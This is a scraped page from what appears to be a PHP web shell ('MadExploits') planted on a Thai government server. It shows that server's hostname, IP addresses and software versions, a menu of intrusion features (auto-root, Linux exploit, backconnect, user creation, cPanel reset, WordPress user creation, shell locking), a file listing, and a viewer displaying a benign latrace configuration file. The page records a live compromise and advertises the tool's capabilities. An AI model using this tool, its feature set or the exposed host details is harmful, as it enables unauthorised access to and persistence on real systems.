Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
latrace.d /
[ HOME SHELL ]
Name
Size
Permission
Action
sysdeps
[ DIR ]
drwxr-xr-x
ctype.conf
392
B
-rw-r--r--
dirent.conf
825
B
-rw-r--r--
dlfcn.conf
417
B
-rw-r--r--
fcntl.conf
643
B
-rw-r--r--
getopt.conf
273
B
-rw-r--r--
inet.conf
655
B
-rw-r--r--
ioctl.conf
68
B
-rw-r--r--
libintl.conf
651
B
-rw-r--r--
libio.conf
646
B
-rw-r--r--
locale.conf
286
B
-rw-r--r--
misc.conf
292
B
-rw-r--r--
mman.conf
976
B
-rw-r--r--
ncurses.conf
10.77
KB
-rw-r--r--
netdb.conf
3.84
KB
-rw-r--r--
pthread.conf
7.51
KB
-rw-r--r--
pwd.conf
869
B
-rw-r--r--
resource.conf
2.24
KB
-rw-r--r--
signal.conf
2.56
KB
-rw-r--r--
socket.conf
3.29
KB
-rw-r--r--
stat.conf
1.6
KB
-rw-r--r--
stdio.conf
3.85
KB
-rw-r--r--
stdlib.conf
6.18
KB
-rw-r--r--
string.conf
2.77
KB
-rw-r--r--
syslog.conf
198
B
-rw-r--r--
term.conf
934
B
-rw-r--r--
termios.conf
671
B
-rw-r--r--
time.conf
1.6
KB
-rw-r--r--
typedefs.conf
472
B
-rw-r--r--
unistd.conf
4.3
KB
-rw-r--r--
utmp.conf
564
B
-rw-r--r--
wait.conf
419
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : resource.conf
/* /usr/include/sys/resource.h */ /* Kinds of resource limit. */ enum rlimit_resource { /* Per-process CPU limit, in seconds. */ RLIMIT_CPU = 0, /* Largest file that can be created, in bytes. */ RLIMIT_FSIZE = 1, /* Maximum size of data segment, in bytes. */ RLIMIT_DATA = 2, /* Maximum size of stack segment, in bytes. */ RLIMIT_STACK = 3, /* Largest core file that can be created, in bytes. */ RLIMIT_CORE = 4, /* Largest resident set size, in bytes. This affects swapping; processes that are exceeding their resident set size will be more likely to have physical memory taken from them. */ RLIMIT_RSS = 5, /* Number of open files. */ RLIMIT_NOFILE = 7, RLIMIT_OFILE = RLIMIT_NOFILE, /* BSD name for same. */ /* Address space limit. */ RLIMIT_AS = 9, /* Number of processes. */ RLIMIT_NPROC = 6, /* Locked-in-memory address space. */ RLIMIT_MEMLOCK = 8, /* Maximum number of file locks. */ RLIMIT_LOCKS = 10, /* Maximum number of pending signals. */ RLIMIT_SIGPENDING = 11, /* Maximum bytes in POSIX message queues. */ RLIMIT_MSGQUEUE = 12, /* Maximum nice priority allowed to raise to. Nice levels 19 .. -20 correspond to 0 .. 39 values of this resource limit. */ RLIMIT_NICE = 13, /* Maximum realtime priority allowed for non-priviledged processes. */ LIMIT_RTPRIO = 14, RLIMIT_NLIMITS = 15 }; /* Whose usage statistics do you want? */ enum rusage_who { /* The calling process. */ RUSAGE_SELF = 0, /* All of its terminated child processes. */ RUSAGE_CHILDREN = -1, /* The calling thread. */ RUSAGE_THREAD = 1 }; enum priority_which { PRIO_PROCESS = 0, /* WHO is a process ID. */ PRIO_PGRP = 1, /* WHO is a process group ID. */ PRIO_USER = 2 /* WHO is a user ID. */ }; extern int getrlimit(int resource = rlimit_resource, void *rlimits); extern int getrlimit64(int resource = rlimit_resource, void *rlimits); extern int setrlimit(int resource = rlimit_resource, void *rlimits); extern int setrlimit64(int resource = rlimit_resource, void *rlimits); extern int getrusage(int who = rusage_who, void *usage); extern int getpriority(int which = priority_which, int who); extern int setpriority (int which = priority_which, int who, int prio);
Close